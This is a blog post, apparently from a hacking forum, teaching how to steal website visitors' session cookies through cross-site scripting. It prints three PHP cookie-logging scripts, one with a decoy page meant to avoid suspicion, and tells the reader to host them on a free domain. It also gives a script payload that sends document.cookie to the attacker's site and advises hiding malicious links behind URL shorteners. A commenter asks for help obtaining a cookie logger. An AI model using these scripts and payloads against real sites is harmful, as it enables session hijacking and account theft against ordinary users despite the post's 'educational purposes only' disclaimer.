Tuesday 22 January 2013

Stealing Cookies With XSS



Post: #1Stealing Cookies with XSS
Code:
The content of this article is meant for educational purposes only. Neither I, nor my web host will be held responsible for what you decide to do with this knowledge.



Creating a Cookie Stealer
Method 1
This is the simplest method of creating a cookie stealer which will steal and save the cookie in a file called cookie.txt

________________________________________________________________________________

Code:
<!--?php
    $cookie = $HTTP_GET_VARS["cookie"];
    $steal = fopen("cookie.txt", "a");
    fwrite($steal, $cookie ."\n");
    fclose($steal);
?-->

________________________________________________________________________________

Method 2
The above method sent the cookies to a file. This method sends the cookie to an email address.

________________________________________________________________________________

Code:
<!--?php
    $cookie = $HTTP_GET_VARS["cookie"]; mail("inputyour@emailhere", "Stolen Cookies", $cookie);
?-->
In the above code you just need to add in your email address.


________________________________________________________________________________


Method 3
The following script is more evolved and will be the one we will use.



________________________________________________________________________________

Code:
<!--?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/bhtmb/i", $ipLog) || preg_match("/bhtmlb/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br-->");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie nn");
    fclose($log);
}

logData();
echo '<center><p>Page Under Construction</p></center>'
// this part is displayed if the page is visited directly, in order to avoid any suspicion...
?>-->

________________________________________________________________________________


The above code not only steals the cookies but will also store the following:
IP address
Port number
Host
User-Agent


Copy and paste the above code in to a text editor and save as a .php file. Create a second file and save it as log.txt. We can leave this file blank as this is where the above information will be sent. You can change the name but if you do so, then you will need to change the name in the cookie stealer code above.


Register a Domain Name
The next step is to sign up with a free hosting company that supports .php files and upload both files created above in to the root directory. If you named the stealer file "zerosec" then it would be located at:
Code:
www.your-domain.com/zerosec.php


Exploiting the Vulnerability
We are not going to cover how to find XSS vulnerable websites here. This tutorial is assuming you already know. If not, let me know in the comments below.


Once you have found a vulnerable website you need to inject the following code between "script" tags.
Code:
(script tag) location.href = 'your-domain.com/zerosec.php?cookie='+document.cookie; (/script tag)


The above URL can be inserted straight in to a vulnerable URL like this:

________________________________________________________________________________

Code:
vulnerablesite.com/index.php?search=(script tag) location.href = 'http://www.your-free-domain.com/stealer.php?cookie='+document.cookie;(/script tag)


________________________________________________________________________________

In the above code, remember to input the script tags.


Difference between Persistent and Non-Persistent XSS
Injecting the code in to a website that is vulnerable to persistent XSS means that the code will remain there forever or until the admin finds and removes it. Everyone that visits the site would be a victim.


In non-persistent XSS attacks, the only victims will be the ones that you actually send the link to. Unlike the persistent attack in which you would only need to inject once. More websites are vulnerable to non-persistent than they are to persistent but there are still plenty out there.


One way in which an attacker will try to trick victims in to clicking their links is to encode the URL. The problem with this is that the URL then becomes pretty long. The simple solution is to use an URL shortening service.


The victim will then be sent the short URL and their cookies will be sent to the log.txt file created and uploaded earlier.

3 comments:

  1. wow i have been looking for cookielogger and seen alot of old post but i guess urs seems more explainable, i would like to talk to you more if you dont mind..... please hit me up @ onesmith2003@gmail.com
    let discuss.

    ReplyDelete